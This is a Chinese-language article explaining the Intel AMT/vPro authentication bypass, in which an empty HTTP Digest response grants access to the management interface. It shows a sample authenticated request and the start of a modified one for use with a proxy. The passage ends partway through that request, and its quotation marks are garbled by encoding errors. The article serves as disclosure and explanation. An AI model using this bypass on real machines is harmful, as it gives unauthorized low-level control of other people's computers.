上周存在长达九年之久的Intel漏洞曝光!直白点儿说:自从2010年起,英特尔出售所有具有远超控制功能的芯片中含有一个严重的漏洞,可以让攻击者获得目标电脑的高级权限。本文将介绍该漏洞的成因和测试验证方法!
这个漏洞让不法分子得以控制使用 vPro 和 AMT 的系统。
59盾网络高防服务器 安全第一!
你可以远程控制采用易受攻击的英特尔芯片的计算机,只要向它们发送空的验证字符串。
你没有看错,确实如此!本该要求你发送一个密码哈希值,你却发送了零字节,什么都没有。想想你会有怎样的回报?居然可以通过网络――如果管理接口面向公共Web的话,还可以通过互联网,获得系统硬件的底层访问权,权限很大。
今天我们获悉,钻这个安全漏洞的空子轻而易举,不需要密码,谁都可以控制易受攻击的系统――我们仍在等待相应的补丁。
AMT是通过一种普通的Web接口经由网络来访问的:该服务侦听端口16992和端口16993。用浏览器访问该服务会弹出提示,要求输入密码,这个密码是使用标准的HTTP Digest验证技术来发送的:使用来自AMT固件的随机数(nonce)以及另外几个元数据,对用户和密码进行哈希处理(即加密)。这个经过加密的响应由英特尔的AMT软件来核实,验证是否有效;如果有效,就将访问权授予管理接口。
但是如果你发送空的响应,固件就会误以为这是有效的响应,让你长行直入。这意味着,如果你使用代理,将响应改成空的字符串,或者以其他方式设置浏览器,发送空的HTTP Digest验证响应,就可以绕过密码核实机制。
大致说来,在后台,你的浏览器通常会向AMT服务发送类似这样的内容,这包括哈希响应字符串,含有用户名、密码和服务器随机数:
GET /index.htm HTTP/1.1
Host: 192.168.1.2:16992
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.2:16992/logon.htm
Connection: keep-alive
Authorization: Digest username=?0?3admin?0?3,
realm=?0?3Digest:048A0000000000000000000000000000?0?3,
nonce=?0?3Q0UGAAQEAAAV4M4iGF4+Ni5ZafuMWy9J?0?3, uri=?0?3/index.htm?0?3,
response=?0?3d3d4914a43454b159a3fa6f5a91d801d?0?3, qop=auth, nc=00000001,
cnonce=?0?39c5beca4011eea5c?0?3
如果使用代理或类似的工具(Burp Suite可以哦),只要去掉响应哈希,改而发送:
GET /index.htm HTTP/1.1
Host: 127.0.0.1:16992
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
Firefox/45.0